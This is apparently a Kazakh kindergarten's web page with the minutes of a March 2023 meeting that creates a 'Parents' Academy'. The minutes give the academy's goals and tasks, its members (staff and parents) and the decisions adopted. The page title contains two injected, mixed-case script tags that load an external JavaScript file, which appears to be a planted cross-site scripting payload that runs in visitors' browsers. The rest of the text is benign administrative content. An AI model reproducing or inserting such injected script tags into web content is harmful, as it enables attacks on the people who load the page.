Ата-аналарға арналған Академиясы отырысының №1 хаттамасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.03.2023

Ата-аналар үшін Академиясы отырысының  №1 хаттамасы

2023 ж. 13.03-нан года

Қатысқандар:

Балабақша қызметкерлері мен ата-аналар

 

Күн тәртібі

1. Ата-аналар үшін Академияны ұйымдастыру, Академияның құрамы туралы бұйрық, Академияның ережесі мен жұмыс жоспарын құру.

Тыңдалды: Меңгеруші Маженова Ж.К. Ата-аналар үшін Академияны ұйымдастыру қажеттілігін анықтады. Мақсаты мен міндерімен таныстырып өтті.                                                                                                                                        1. Академия қызметінің мақсаттары:

- Білім алушының денсаулығын сақтау және нығайту мәселелерінде мектепке дейінгі ұйым ұжымы мен отбасының ынтымақтастығын орнату;

- Білім алушыларды тәрбиелеу және оқыту мәселелері бойынша отбасыларға консультациялық көмек көрсету;

- Ата-аналардың өз денсаулығына және білім алушылардың денсаулығына қатысты белсенді ұстанымын қалыптастыру;

- Білім беру ұйымдарына баратын білім алушыларды тәрбиелеу мен дамытуды жан-жақты психологиялық-педагогикалық сүйемелдеу;

-Ата-аналарға психологиялық-педагогикалық білім беру.

- Ата-аналармен қарым-қатынас түрлерін әртараптандыру (тренингтер, әңгімелер, консультациялар, сауалнамалар, отбасылық тәжірибе алмасу, ашық  ұйымдастырылған іс-шаралар, спартакиадалар, бос уақыт және т.б.).

2. Академияның негізгі міндеттері:

- Ата-аналардың педагогикалық мәдениетін арттыру;

- Білім алушыларды сауықтыру, ағзаның қорғаныс күштерін нығайту мәселелерінде ата-аналарға жан-жақты көмек және қолдау көрсету;

- Білім алушыларды тәрбиелеу және оқыту бойынша оң отбасылық тәжірибені анықтау және тарату;

- Ата-аналар ұжымының бірігуіне ықпал ету ;

- Ата-аналар мен білім беру ұйымдарының ұжымы арасында сенімді қарым-қатынас орнатуға ықпал ету.

- Білім беру ұйымдары мен отбасы жағдайында білім алушыларды тәрбиелеу мен дамытуды оңтайландыру мақсатында білім беру ұйымдары мен ата-аналар арасындағы тиімді өзара іс-қимылды қамтамасыз ету;

-Жан-жақты үйлесімді дамуды қамтамасыз етуде ата-аналарға (заңды өкілдерге) және білім беру ұйымдарына баратын мектепке дейінгі, мектеп жасындағы білім алушыларға жан-жақты психологиялық-педагогикалық көмек көрсету;

-Отбасылардың жеке ерекшеліктерін, мүмкіндіктері мен қажеттіліктерін ескере отырып, білім алушылардың ата-аналарына психологиялық-педагогикалық білім беру;

-Мектепке дейінгі ұйымдар мен мектептерге баратын мектеп жасындағы, мектеп жасындағы білім алушылардың дене, психикалық және әлеуметтік дамуындағы әртүрлі ауытқулардың кешенді профилактикасын және түзетуін (қажет болған жағдайда) жүргізу.

Ата-аналарға арналған Академиясының  құрамына келесі кандидатуралар ұсынылды:

  • Ж.К.Маженова - меңгеруші
  • А.С.Канафина - әдіскер
  • А.Ф.Темірке - психолог
  • А.Б.Оспанова - дене тәрбиесі
  • Д.С.Абдильманова - музыка жетекшісі
  • Р.С.Малгаждарова - логопед
  • М.И.Куанбекова -  дефектолог
  • Ж.К.Кабылдина - ата-ана
  • Ю.В.Цихоцкая –ата-ана
  • А.С.Жақсыбай –ата-ана
  • А.Т.Тажмиева –ата-ана

Шешімі:

1. Ата-аналар үшін Академияны ұйымдастырылсын, Академияның құрамы туралы бұйрық, Академияның ережесі мен жұмыс жоспарын құрылсын.

2. Академияның келесі құрамы бекітілсін:

  • Ж.К.Маженова - меңгеруші
  • А.С.Канафина - әдіскер
  • А.Ф.Темірке - психолог
  • А.Б.Оспанова - дене тәрбиесі
  • Д.С.Абдильманова - музыка жетекшісі
  • Р.С.Малгаждарова - логопед
  • М.И.Куанбекова -  дефектолог
  • Ж.К.Кабылдина - ата-ана
  • Ю.В.Цихоцкая –ата-ана
  • А.С.Жақсыбай –ата-ана
  • А.Т.Тажмиева –ата-ана

Төрайымы                                                 Маженова Ж.К.

Хатшы                                                      Малгаждарова Р.С.

Просмотров: 359


Пікір қосу



Деректерді қолтаңбаға қосу